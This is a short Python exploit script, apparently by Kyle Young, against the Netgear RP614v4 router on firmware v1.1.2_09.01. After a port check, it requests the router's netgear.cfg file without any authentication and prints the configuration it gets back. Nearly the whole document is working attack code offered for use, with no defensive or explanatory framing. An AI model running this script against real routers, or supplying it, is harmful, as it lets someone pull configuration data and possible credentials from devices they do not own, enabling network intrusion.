#!/usr/bin/env python #RP614v4 Exploit #Tested on Firmware version: v1.1.2_09.01 (Newest as of Wed Mar 24, 2010 #Author: Kyle Young import urllib2 import sys import socket def listhelp(): print "Please invoke this program with an IP and port" print "Example: python rp614v4exploit.py 80" print "Example: python rp614v4exploit.py [public ip] 8080" sys.exit(1) if len(sys.argv) < 3: listhelp() host = sys.argv[1] port = sys.argv[2] port = int(port) try: con = socket.socket() con.settimeout(0.25) con.connect((host, port)) con.close() except socket.error: con.close() print "Port appears to be closed on this host.." sys.exit(1) exploit = "http://%s:%d/vgn/jsp/netgear.cfg" % (sys.argv[1], port) #Yes.. I know I see it..# try: request = urllib2.urlopen(exploit) config = request.read() print config sys.exit(0) except urllib2.HTTPError: print "I could not download the netgear.cfg file, make sure you have the right address or the router may have had a fix/patch applied to it" sys.exit(1)